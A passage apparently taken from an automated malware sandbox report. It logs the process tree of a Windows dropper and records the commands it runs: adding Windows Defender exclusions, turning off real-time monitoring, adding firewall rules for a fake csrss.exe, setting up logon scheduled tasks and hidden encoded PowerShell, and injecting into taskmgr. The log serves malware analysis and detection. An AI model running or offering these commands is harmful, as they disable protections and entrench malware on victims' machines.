CasPol.exe 39 PID 1800 wrote to memory of 2340 1800 CasPol.exe 39 PID 1800 wrote to memory of 2340 1800 CasPol.exe 39 PID 1800 wrote to memory of 2340 1800 CasPol.exe 39 PID 1800 wrote to memory of 2340 1800 CasPol.exe 39 PID 1800 wrote to memory of 2340 1800 CasPol.exe 39 PID 2340 wrote to memory of 700 2340 Fku5AId0LuZ4E8yzod75BtEi.exe 272 PID 2340 wrote to memory of 700 2340 Fku5AId0LuZ4E8yzod75BtEi.exe 272 PID 2340 wrote to memory of 700 2340 Fku5AId0LuZ4E8yzod75BtEi.exe 272 PID 2340 wrote to memory of 700 2340 Fku5AId0LuZ4E8yzod75BtEi.exe 272 PID 2340 wrote to memory of 700 2340 Fku5AId0LuZ4E8yzod75BtEi.exe 272 PID 2340 wrote to memory of 700 2340 Fku5AId0LuZ4E8yzod75BtEi.exe 272 PID 2340 wrote to memory of 700 2340 Fku5AId0LuZ4E8yzod75BtEi.exe 272 PID 2956 wrote to memory of 2960 2956 Btpmb8l6OLnsIVBHYXzcfv46.exe 41 PID 2956 wrote to memory of 2960 2956 Btpmb8l6OLnsIVBHYXzcfv46.exe 41 PID 2956 wrote to memory of 2960 2956 Btpmb8l6OLnsIVBHYXzcfv46.exe 41 PID 2956 wrote to memory of 2960 2956 Btpmb8l6OLnsIVBHYXzcfv46.exe 41 PID 2956 wrote to memory of 2960 2956 Btpmb8l6OLnsIVBHYXzcfv46.exe 41 PID 2956 wrote to memory of 2960 2956 Btpmb8l6OLnsIVBHYXzcfv46.exe 41 PID 2956 wrote to memory of 2960 2956 Btpmb8l6OLnsIVBHYXzcfv46.exe 41 PID 1520 wrote to memory of 1256 1520 Ahzn2Szwr26hfrPXyZRPFZkG.exe 47 PID 1520 wrote to memory of 1256 1520 Ahzn2Szwr26hfrPXyZRPFZkG.exe 47 PID 1520 wrote to memory of 1256 1520 Ahzn2Szwr26hfrPXyZRPFZkG.exe 47 PID 1520 wrote to memory of 1256 1520 Ahzn2Szwr26hfrPXyZRPFZkG.exe 47 PID 1256 wrote to memory of 2844 1256 cmd.exe 43 PID 1256 wrote to memory of 2844 1256 cmd.exe 43 PID 1256 wrote to memory of 2844 1256 cmd.exe 43 PID 884 wrote to memory of 2840 884 lhuGc8cD8YBgMslw3CZs4Nqs.exe 45 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe"C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe"1⤵
- Windows security bypass
- Windows security modification
PID:700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe" -Force2⤵PID:2024
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Users\Admin\Pictures\3abumA8EPhmpkupXkwlsWKNH.exe"C:\Users\Admin\Pictures\3abumA8EPhmpkupXkwlsWKNH.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1872
-
-
C:\Users\Admin\Pictures\lhuGc8cD8YBgMslw3CZs4Nqs.exe"C:\Users\Admin\Pictures\lhuGc8cD8YBgMslw3CZs4Nqs.exe"3⤵PID:544
-
C:\Users\Admin\Pictures\lhuGc8cD8YBgMslw3CZs4Nqs.exe"C:\Users\Admin\Pictures\lhuGc8cD8YBgMslw3CZs4Nqs.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2840
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:2616
-
-
-
-
-
C:\Users\Admin\Pictures\Fku5AId0LuZ4E8yzod75BtEi.exe"C:\Users\Admin\Pictures\Fku5AId0LuZ4E8yzod75BtEi.exe" /VERYSILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Users\Admin\AppData\Local\Temp\is-IRA4F.tmp\Fku5AId0LuZ4E8yzod75BtEi.tmp"C:\Users\Admin\AppData\Local\Temp\is-IRA4F.tmp\Fku5AId0LuZ4E8yzod75BtEi.tmp" /SL5="$C011C,831488,831488,C:\Users\Admin\Pictures\Fku5AId0LuZ4E8yzod75BtEi.exe" /VERYSILENT4⤵PID:700
-
-
-
C:\Users\Admin\Pictures\OQrMVozqayLadUiGGxpM2SWK.exe"C:\Users\Admin\Pictures\OQrMVozqayLadUiGGxpM2SWK.exe"3⤵
- Executes dropped EXE
PID:1852
-
-
C:\Users\Admin\Pictures\Btpmb8l6OLnsIVBHYXzcfv46.exe"C:\Users\Admin\Pictures\Btpmb8l6OLnsIVBHYXzcfv46.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2956
-
-
C:\Users\Admin\Pictures\Ahzn2Szwr26hfrPXyZRPFZkG.exe"C:\Users\Admin\Pictures\Ahzn2Szwr26hfrPXyZRPFZkG.exe"3⤵PID:540
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1296
-
-
-
C:\Users\Admin\Pictures\wxzSv0RPCLFiIJpPm8GSlIWp.exe"C:\Users\Admin\Pictures\wxzSv0RPCLFiIJpPm8GSlIWp.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==3⤵
- Executes dropped EXE
PID:1716
-
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240204034220.log C:\Windows\Logs\CBS\CbsPersist_20240204034220.cab1⤵PID:1764
-
C:\Users\Admin\Pictures\Ahzn2Szwr26hfrPXyZRPFZkG.exe"C:\Users\Admin\Pictures\Ahzn2Szwr26hfrPXyZRPFZkG.exe"1⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"2⤵
- Suspicious use of WriteProcessMemory
PID:1256
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2156 -
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v3⤵
- Modifies boot configuration data using bcdedit
PID:300
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F3⤵
- Creates scheduled task(s)
PID:2392
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"3⤵
- Executes dropped EXE
PID:2848 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)4⤵PID:1732
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS3DCB.tmp\Install.exe.\Install.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2960 -
C:\Users\Admin\AppData\Local\Temp\7zS4598.tmp\Install.exe.\Install.exe /mGaXdidI "385118" /S2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:2556 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gheXiYzEa" /SC once /ST 02:18:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gheXiYzEa"3⤵PID:1836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gheXiYzEa"3⤵PID:2540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwKBwqZYjkqxftWshF" /SC once /ST 03:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\eYLayuZ.exe\" cj /jtsite_idcNK 385118 /S" /V1 /F3⤵
- Creates scheduled task(s)
PID:2580
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:2844
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&1⤵PID:2900
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:642⤵PID:1968
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:322⤵PID:3020
-
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&1⤵PID:1056
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:642⤵PID:2072
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:322⤵PID:2112
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F1⤵
- Creates scheduled task(s)
PID:2772
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1628
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f1⤵PID:348
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"1⤵PID:2768
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"1⤵PID:2928
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2596
-
C:\Windows\system32\taskeng.exetaskeng.exe {2DF579F3-DC69-48EC-9E03-60B99B134EC0} S-1-5-21-3818056530-936619650-3554021955-1000:SFVRQGEO\Admin:Interactive:[1]1⤵PID:2332
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1176
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:452 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1092
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:3056
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2520
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1672 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1272
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2380
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:3020
-
C:\Windows\system32\taskeng.exetaskeng.exe {3565A2E0-9A18-4148-AC3A-1D876DF201BF} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3064
-
C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\eYLayuZ.exeC:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\eYLayuZ.exe cj /jtsite_idcNK 385118 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2268 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRVicEdMr" /SC once /ST 00:53:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1136
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRVicEdMr"3⤵PID:496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRVicEdMr"3⤵PID:2172
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:696
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gizzjgiJB" /SC once /ST 00:47:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gizzjgiJB"3⤵PID:2692
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1444
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1624
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gizzjgiJB"3⤵PID:2900
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:643⤵PID:1828
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1504
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:643⤵PID:1744
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\RZfGRCgJsrDIEOco\gOvGNKio\bEiwlcTrlGCrRBtN.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1660 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:644⤵PID:2620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:324⤵PID:1692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:644⤵PID:1724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:324⤵PID:1504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:644⤵PID:2344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:324⤵PID:332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:644⤵PID:1136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:644⤵PID:472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:324⤵PID:2448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:644⤵PID:2004
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RZfGRCgJsrDIEOco\JZwkkdJX\nHMdFzJ.dll",#1 /GXsite_idqnL 3851185⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2900 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "EtrQGzrpWMpnyWxNE"6⤵PID:1328
-
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:324⤵PID:2812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:644⤵PID:2688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:324⤵PID:3068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:324⤵PID:1920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:644⤵PID:2072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:324⤵PID:2940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2696
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:645⤵PID:1160
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:324⤵
